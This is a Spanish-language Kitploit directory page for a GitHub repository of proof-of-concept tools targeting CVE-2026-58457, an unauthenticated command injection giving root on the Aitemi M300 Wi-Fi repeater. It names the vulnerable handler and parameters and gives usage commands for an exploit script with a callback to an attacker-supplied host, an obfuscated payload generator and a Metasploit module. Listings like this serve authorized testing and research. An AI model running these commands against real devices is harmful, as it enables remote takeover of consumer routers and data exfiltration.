Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
Herramientas/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

Ver Repositorio
2hace 1 mesAún no revisado

CVE-2026-58457 - Inyección de comandos del sistema operativo no autenticada en el repetidor Wi-Fi Shenzhen Aitemi M300

[!WARNING] Este código se proporciona tal cual, únicamente con fines educativos y de investigación. No utilice este PoC en sistemas de producción, entornos compartidos ni en objetivos no autorizados.

  • Ejecutar o alojar este código puede provocar detecciones de antivirus, alertas de monitoreo de seguridad o consecuencias legales si se usa indebidamente.
  • Los autores y mantenedores del repositorio no asumen ninguna responsabilidad por daños, uso indebido o actividad ilegal derivados de este código.
  • Úselo exclusivamente en entornos de laboratorio aislados con la autorización adecuada. Destinado únicamente a investigación defensiva, análisis de vulnerabilidades y pruebas de blue team.

Resumen de la vulnerabilidad

Existe una vulnerabilidad de inyección de comandos del sistema operativo no autenticada en el manejador smacfilter_conf. Los parámetros GET name, enable y mac se pasan sin sanear a una llamada sprintf() que construye comandos UCI ejecutados como root.

  • Gravedad: Crítica (CVSS 9.8)
  • Impacto: Ejecución remota de comandos como root sin autenticación requerida

Herramientas Incluidas

  • poc.py - Exploit completo con soporte HTTPS, reintentos, tiempo de espera y exfiltración mediante callback.
  • val.py - Validador de vulnerabilidades pasivo y seguro (usa el comando id, inofensivo).
  • gen.py - Generador avanzado de payloads con múltiples técnicas de ofuscación.
  • MITIGATIONS.md - Medidas defensivas recomendadas.
  • Módulo Metasploit - Disponible en el directorio exploit/.

Instalación

root@kitploit:~
pip install requests

Uso Rápido

  1. Validar (Seguro)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Explotar (Solo Pruebas Autorizadas)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Generar Payloads Ofuscados
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Mover el módulo
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Recargar todo
root@kitploit:~
msfconsole -q -x "reload_all"

Referencias

  • CVE-2026-58457
  • Aviso de VulnCheck
  • Divulgación en GitHub

Las estrellas y contribuciones son bienvenidas - especialmente mejoras para bypasses o variantes adicionales de firmware.

Descargar herramienta